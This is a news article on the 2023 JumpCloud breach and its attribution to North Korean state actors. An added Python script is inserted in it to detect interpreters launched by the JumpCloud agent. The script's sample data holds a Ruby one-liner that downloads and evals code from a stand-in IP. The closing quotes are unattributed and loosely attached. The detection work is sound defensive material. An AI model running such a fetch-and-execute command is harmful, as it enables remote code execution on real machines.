
North Korean Nation-State Actors Exposed in JumpCloud Hack After OPSEC Blunder
2023-07-25 14:46

The JumpCloud hack has been attributed to North Korean nation-state actors affiliated with the Reconnaissance General Bureau, following an operational security blunder that exposed their real IP address.

The intrusion against JumpCloud began on June 22, 2023, with a sophisticated spear-phishing campaign; the attackers then leveraged the resulting unauthorized access to breach fewer than five customers and fewer than 10 systems, in what amounts to a software supply chain attack.

Mandiant's findings are based on an incident response engagement begun in the aftermath of a cyber attack against one of JumpCloud's impacted customers, an unnamed software solutions entity. The starting point was a malicious Ruby script executed via the JumpCloud agent on June 27, 2023.
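One way to hunt for the initial vector described above, a script interpreter launched through the JumpCloud agent, is to baseline what the agent spawns and alert on interpreters running inline code or scripts staged in world-writable directories. The following is an added Python example, not code from Mandiant, JumpCloud or the article; the telemetry lines are constructed, and the agent binary path /opt/jc/bin/jumpcloud-agent, the event field names and the admin-command allowlist are assumptions for illustration.

```python
import json
import shlex

# Constructed sample process-execution telemetry (not real logs). The field
# layout and the agent path /opt/jc/bin/jumpcloud-agent are assumptions.
# 198.51.100.7 is a documentation (TEST-NET-2) address.
SAMPLE_EVENTS_JSONL = """
{"host":"mac-dev-01","os":"macOS 13.4.1","parent":"/opt/jc/bin/jumpcloud-agent","image":"/usr/bin/ruby","cmdline":"ruby /tmp/update.rb"}
{"host":"mac-dev-01","os":"macOS 13.4.1","parent":"/opt/jc/bin/jumpcloud-agent","image":"/bin/bash","cmdline":"bash -c 'softwareupdate -l'"}
{"host":"mac-dev-02","os":"macOS 13.3","parent":"/Applications/iTerm.app/Contents/MacOS/iTerm2","image":"/usr/bin/ruby","cmdline":"ruby spec/run_tests.rb"}
{"host":"mac-dev-03","os":"macOS 13.4.1","parent":"/opt/jc/bin/jumpcloud-agent","image":"/usr/bin/ruby","cmdline":"ruby -e \\"require 'open-uri'; eval(URI.open('http://198.51.100.7/x').read)\\""}
"""

AGENT_MARKER = "jumpcloud-agent"          # assumed agent binary name
INTERPRETERS = {"ruby", "python", "python3", "perl", "osascript", "bash", "sh", "zsh"}
STAGING_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")
# Shell one-liners your admins are known to push through the agent (constructed).
ALLOWED_SHELL_COMMANDS = {"softwareupdate -l"}


def parse_events(jsonl):
    """Parse one JSON object per non-empty line."""
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def classify(event):
    """Return None if the event is benign, else a (severity, reason) tuple."""
    if AGENT_MARKER not in event.get("parent", ""):
        return None                      # not spawned by the agent: out of scope
    interpreter = event.get("image", "").rsplit("/", 1)[-1]
    if interpreter not in INTERPRETERS:
        return None
    cmdline = event.get("cmdline", "")
    try:
        argv = shlex.split(cmdline)
    except ValueError:                   # unbalanced quotes: fall back to a crude split
        argv = cmdline.split()
    # Known admin shell one-liners are allowlisted; everything else the agent
    # hands to an interpreter is at least worth a look.
    if (interpreter in ("bash", "sh", "zsh") and len(argv) >= 3
            and argv[1] == "-c" and argv[2] in ALLOWED_SHELL_COMMANDS):
        return None
    if "-e" in argv[1:] or "-c" in argv[1:]:
        return ("high", "inline code passed to interpreter")
    if any(arg.startswith(STAGING_DIRS) for arg in argv[1:]):
        return ("high", "script executed from staging directory")
    return ("medium", "interpreter spawned by agent")


def detect(events):
    """Run classify() over all events and collect findings in input order."""
    findings = []
    for ev in events:
        result = classify(ev)
        if result:
            severity, reason = result
            findings.append({"host": ev["host"], "severity": severity,
                             "reason": reason, "cmdline": ev["cmdline"]})
    return findings


if __name__ == "__main__":
    for f in detect(parse_events(SAMPLE_EVENTS_JSONL)):
        print(f"[{f['severity']}] {f['host']}: {f['reason']} :: {f['cmdline']}")
```

The agent legitimately runs administrator commands, so the allowlist is what keeps this from paging on every routine job; in practice it would be built from a few weeks of your own agent telemetry rather than hard-coded.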

A notable aspect of the incident is its targeting of four Apple systems running macOS Ventura 13.3 or 13.4.1, underscoring North Korean actors' continued investment in malware tailored to the platform in recent months.

"The vast attack surface presented by these ecosystems is hard to ignore. It's virtually impossible for a developer in today's world not to rely on any open-source packages. This reality is typically exploited by threat actors aiming to maximize their blast radius for widespread distribution of malware, such as stealers or ransomware."

"The Kimsuky APT group is continuously launching spear-phishing attacks against Korean users," ASEC pointed out this month.

News URL

https://thehackernews.com/2023/07/north-korean-nation-state-actors.html